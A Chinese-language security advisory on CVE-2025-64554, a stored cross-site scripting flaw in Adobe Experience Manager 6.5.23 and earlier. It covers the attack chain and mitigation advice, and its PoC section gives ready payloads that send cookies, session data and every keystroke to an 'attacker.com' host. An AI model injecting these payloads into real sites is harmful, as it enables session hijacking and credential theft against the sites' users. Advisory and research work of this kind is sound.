CVE-2025-64554 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64554

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64554是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞，CVSS评分5.4，属于中等严重程度。该漏洞影响Adobe Experience Manager 6.5.23及之前版本。攻击者利用此漏洞可以通过低权限账户在表单字段中注入恶意JavaScript脚本。当其他用户浏览包含恶意脚本的页面时，浏览器会执行这些恶意代码，从而可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。存储型XSS相比反射型XSS更为危险，因为恶意脚本被永久存储在服务器端，所有访问该页面的用户都可能受到影响。Adobe官方已确认此漏洞并发布安全公告(APSB25-115)，建议用户尽快升级到修复版本以消除安全风险。

技术细节

该漏洞是Adobe Experience Manager中存在的存储型跨站脚本(CWE-79)问题。在AEM的表单处理流程中，系统未能对用户输入进行充分的HTML实体编码和输入验证。攻击者以低权限用户身份登录后，可以在表单字段(如文本输入框、文本区域、富文本编辑器等)中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>。这些恶意载荷被存储到服务器数据库中，当其他用户访问包含该表单的页面时，服务器将未经处理的数据返回给客户端浏览器，浏览器将其作为HTML解析并执行其中的JavaScript代码。攻击者可利用此漏洞窃取用户会话Cookie、劫持用户账户、执行未经授权的操作或传播恶意内容。由于攻击发生在合法网站上下文中，用户难以察觉异常，攻击成功率较高。

攻击链分析

STEP 1

信息收集

攻击者识别目标Adobe Experience Manager版本，确认版本<=6.5.23以确定漏洞存在

STEP 2

账户获取

攻击者获取或注册一个低权限AEM用户账户，通常通过社工或利用其他漏洞获得

STEP 3

恶意载荷注入

攻击者登录AEM后台，在表单字段(如评论、用户资料、页面内容等)中注入存储型XSS恶意代码

STEP 4

载荷持久化

恶意脚本被存储到AEM的JCR仓库或数据库中，成为页面内容的一部分

STEP 5

等待受害者访问

攻击者等待或诱使目标用户(管理员或其他用户)访问包含恶意脚本的页面

STEP 6

脚本执行

受害者浏览器加载页面时，服务器返回未经过滤的恶意内容，浏览器执行其中的JavaScript代码

STEP 7

数据窃取/会话劫持

恶意脚本窃取用户Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64554 Adobe Experience Manager Stored XSS PoC -->
<!-- This PoC demonstrates the stored XSS vulnerability in AEM form fields -->
<!-- Steps to reproduce: -->
<!-- 1. Login to Adobe Experience Manager with low-privileged user -->
<!-- 2. Navigate to a form component that allows user input -->
<!-- 3. Inject the following payload in any text field -->

<!-- Basic XSS Payload -->
<script>alert('XSS')</script>

<!-- Cookie Stealing Payload -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie))">

<!-- Session Hijacking Payload -->
<script>
  var img = new Image();
  img.src = 'https://attacker.com/log?data=' + encodeURIComponent(document.cookie + '|'+ document.location.href);
  document.body.appendChild(img);
</script>

<!-- Keylogger Payload -->
<script>
  document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/keys?k=' + e.key);
  });
</script>

<!-- After injection: -->
<!-- Any user viewing the page containing the malicious field will have the script executed in their browser -->

影响范围

Adobe Experience Manager 6.5.23及之前所有版本

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1)禁用或限制表单组件中HTML内容的渲染，改为纯文本模式；2)部署WAF(Web应用防火墙)规则过滤XSS特征字符，如<script>、javascript:、onerror等；3)对AEM前端添加输入过滤和输出编码中间件；4)限制低权限用户对表单编辑功能的访问；5)监控日志中异常的JavaScript代码模式；6)考虑使用DOMPurify等客户端库对所有用户生成内容进行清理。但最根本的解决方案仍是尽快升级到Adobe官方修复版本。